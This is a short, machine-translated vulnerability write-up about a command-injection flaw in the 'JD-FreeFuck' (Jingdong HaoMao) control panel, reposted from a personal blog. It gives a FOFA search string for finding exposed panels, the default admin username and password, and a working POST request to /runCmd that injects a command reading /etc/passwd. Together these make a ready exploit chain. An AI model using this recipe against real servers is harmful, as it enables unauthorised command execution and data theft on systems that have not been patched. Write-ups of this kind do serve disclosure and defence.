当前位置:网站首页>JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability

JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability

2022-04-23 18:05:00 Lonely and lazy deed

Vulnerability description

i JD-FreeFuck There is a background Command Execution Vulnerability , Because the content is not filtered when the command is executed by passing parameters , Causes arbitrary commands to be executed , Control server Project address : https://github.com/meselson/JD-FreeFuck

Holes affect

s JD-FreeFuck

Space mapping

d FOFA:title=" Jingdong HaoMao control panel "

Loophole recurrence

  • After visiting, the login page is as follows

image-20220422224258613

  • Default account useradmin/supermanito
POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

image-20220422224428337

Personal blog

Lonely and lazy deed :https://gylq.gitee.io/time

版权声明
本文为[Lonely and lazy deed]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html